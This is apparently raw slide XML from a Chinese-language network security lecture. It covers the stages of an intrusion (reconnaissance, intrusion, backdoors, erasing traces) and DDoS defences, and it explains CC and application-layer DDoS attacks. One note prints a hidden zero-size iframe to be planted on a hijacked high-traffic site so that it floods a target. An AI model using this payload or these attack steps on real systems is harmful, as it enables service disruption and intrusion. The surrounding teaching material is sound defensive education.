        <a:ext cx="1166666" cy="777777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{45FD3591-EA83-451B-81BA-F875FC75574F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2123502" y="2138717"/>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a:t>入侵</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2592043" y="2138717"/>
        <a:ext cx="1405622" cy="937081"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7F2B8B70-7CBA-4C33-95C4-F5F7BEA7BEDA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4161654" y="2218369"/>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实施攻击</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4550543" y="2218369"/>
        <a:ext cx="1166666" cy="777777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{464553F1-F566-41B4-A4E2-D4F3F66EE5C7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2123502" y="3206990"/>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a:t>留后门</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2592043" y="3206990"/>
        <a:ext cx="1405622" cy="937081"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6993B75D-8261-4653-8236-9368EAEAA5DA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4161654" y="3286642"/>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方便再来</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4550543" y="3286642"/>
        <a:ext cx="1166666" cy="777777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B16094DE-C0F7-4F59-B269-D0E461B92465}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2123502" y="4275263"/>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去痕迹</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2592043" y="4275263"/>
        <a:ext cx="1405622" cy="937081"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E82D0B69-E2C1-4072-A113-41485980D2F2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4161654" y="4354915"/>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消灭犯罪证据</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4550543" y="4354915"/>
        <a:ext cx="1166666" cy="777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71CE8-5198-421B-84BD-1D9102C5ADEC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2123502" y="2172"/>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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2700" kern="1200"/>
            <a:t>踩点</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2592043" y="2172"/>
        <a:ext cx="1405622" cy="937081"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A83D3B60-C7BE-491C-9720-07817B029B4E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4161654" y="81824"/>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收集信息</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4550543" y="81824"/>
        <a:ext cx="1166666" cy="777777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{305223FD-0CBC-4969-B72C-6ABDCCAD7C8B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2123502" y="1070444"/>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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2700" kern="1200"/>
            <a:t>定位</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2592043" y="1070444"/>
        <a:ext cx="1405622" cy="937081"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7C8D1023-F37B-4AC2-B917-839BC525A8C2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4161654" y="1150096"/>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分析目标</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4550543" y="1150096"/>
        <a:ext cx="1166666" cy="777777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{45FD3591-EA83-451B-81BA-F875FC75574F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2123502" y="2138717"/>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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2700" kern="1200"/>
            <a:t>入侵</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2592043" y="2138717"/>
        <a:ext cx="1405622" cy="937081"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7F2B8B70-7CBA-4C33-95C4-F5F7BEA7BEDA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4161654" y="2218369"/>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实施攻击</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4550543" y="2218369"/>
        <a:ext cx="1166666" cy="777777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{464553F1-F566-41B4-A4E2-D4F3F66EE5C7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2123502" y="3206990"/>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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2700" kern="1200"/>
            <a:t>留后门</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2592043" y="3206990"/>
        <a:ext cx="1405622" cy="937081"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6993B75D-8261-4653-8236-9368EAEAA5DA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4161654" y="3286642"/>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方便再来</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4550543" y="3286642"/>
        <a:ext cx="1166666" cy="777777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B16094DE-C0F7-4F59-B269-D0E461B92465}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2123502" y="4275263"/>
          <a:ext cx="2342703" cy="937081"/>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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2700" kern="1200"/>
            <a:t>抹去痕迹</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2592043" y="4275263"/>
        <a:ext cx="1405622" cy="937081"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E82D0B69-E2C1-4072-A113-41485980D2F2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4161654" y="4354915"/>
          <a:ext cx="1944443" cy="777777"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">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13970" rIns="0" bIns="13970" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="977900" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2200" kern="1200"/>
            <a:t>消灭犯罪证据</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4550543" y="4354915"/>
        <a:ext cx="1166666" cy="77777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1239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239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239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9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239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DAA3022-0CAB-4EC6-99D2-5818CE3AB5CA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25958525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12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661761-AE77-440E-B231-E11A97596515}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>1</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1751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F44F8-0E30-4A0D-8068-8F33666D5743}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185346" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185347"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89511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D83F9E1-2C90-4C41-854A-A1FDE1E9C22F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>177</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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881423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180</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30240268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31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B5E600D6-85FE-4FBF-B5B2-DD91A0C43656}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>181</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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635127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C49AAF3E-6775-4683-8686-33C6AA674794}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" fontAlgn="base" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>182</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>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latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30473333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异常流量的清洗过滤：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>硬件防火墙对异常流量的清洗过滤，通过数据包的规则过滤、数据流指纹检测过滤、及数据包内容定制过滤等顶尖技术能准确判断外来访问流量是否正常，进一步将异常流量禁止过滤。单台负载每秒可防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>800-927</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>万个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击包。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分布式集群防御：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这是目前网络安全界防御大规模</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击的最有效办法。分布式集群防御的特点是在每个节点服务器配置多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址，并且每个节点能承受不低于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>10G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击，如一个节点受攻击无法提供服务，系统将会根据优先级设置自动切换另一个节点，并将攻击者的数据包全部返回发送点，使攻击源成为瘫痪状态，从更为深度的安全防护角度去影响企业的安全执行决策。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>高防智能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>解析：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>高智能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>解析系统与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防御系统的完美结合，为企业提供对抗新兴安全威胁的超级检测功能。它颠覆了传统一个域名对应一个镜像的做法，智能根据用户的上网路线将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>解析请求解析到用户所属网络的服务器。同时智能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>解析系统还有宕机检测功能，随时可将瘫痪的服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>智能更换成正常服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，为企业的网络保持一个永不宕机的服务状态。</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189</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5600888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Yiban9-25</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190</a:t>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Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>CC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>攻击：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Challenge Collapasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Collapasar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>是绿盟的反 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DDOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>设备，能有效地清洗 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SYN Flood </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>等有害流量），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>CC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>攻击的原理就是对一些消耗资源（查询数据库、读写硬盘文件等）较大的应用页面不断发起正常的请求，以此达到消耗服务资源的目的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>应用层 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DDOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>攻击的一种实现方式：在黑客入侵了一个流量很大的网站后，通过篡改页面，将巨大的用户流量分流到目标网站。比如在大流量网站上插入如下代码：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;iframe src="http://targetSite" height=0 width=0&gt;&lt;/iframe&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>一些优化服务器性能的方法能够缓解应用层 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DDOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>攻击（提升服务能力、资源容量）。常用的防御措施是在应用中限制每个“客户端” 做请求频率的限制（基于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Cookie </a:t>
            </a:r>
            <a:r>
